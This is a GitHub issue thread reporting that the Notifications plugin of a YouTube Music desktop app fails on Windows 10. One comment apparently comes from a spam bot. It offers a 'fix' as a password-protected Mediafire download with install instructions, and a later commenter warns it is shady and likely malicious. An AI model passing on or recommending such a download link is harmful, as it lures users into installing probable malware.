### ISSUE TITLE
[Bug]: Noitifications dont work

### ISSUE THREAD

**Issue by biqsweet** [th-ch/youtube-music#2370]
### Preflight Checklist

- [X] I use the latest version of YouTube Music (Application).
- [X] I have searched the [issue tracker](https://github.com/th-ch/youtube-music/issues) for a bug report that matches the one I want to file, without success.
- [X] I understand that **th-ch/youtube-music has NO affiliation with Google or YouTube**

### YouTube Music (Application) Version

3.5.1

### Checklists

- [ ] I use the portable version of the YouTube Music Application.
- [ ] I can reproduce this issue in the [official version of (WEB) YTM](https://music.youtube.com).

### What operating system are you using?

Windows

### Operating System Version

Windows 10

### What CPU architecture are you using?

x64

### Reproduction steps

1.Enable the Notifications plugin
2.Skip a song

### Expected Behavior

When I skip a song it should send a notification

### Actual Behavior

When I skip a song it doesn't send a notification

### Enabled plugins

1.Ad Blocker
2.Album Color Theme
3.Compact Sidebar
4.In-App Menu
5.Lyrics genius
6.Navigation
7.Notifications
8.Precise Volume
9.Skip Disliked Songs
10.Taskbar Media Control
11.Video Toggle

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by h-banii** [comment]
**do NOT download/execute anything jia6214876 is sharing. That's shady.**

I just did a quick search and it's a bot sending the same comment with the same mediafire link to multiple repositories (place `commenter:jia6214876` in github search bar to find those comments).

We should probably delete/hide their comment to prevent people from even downloading that.
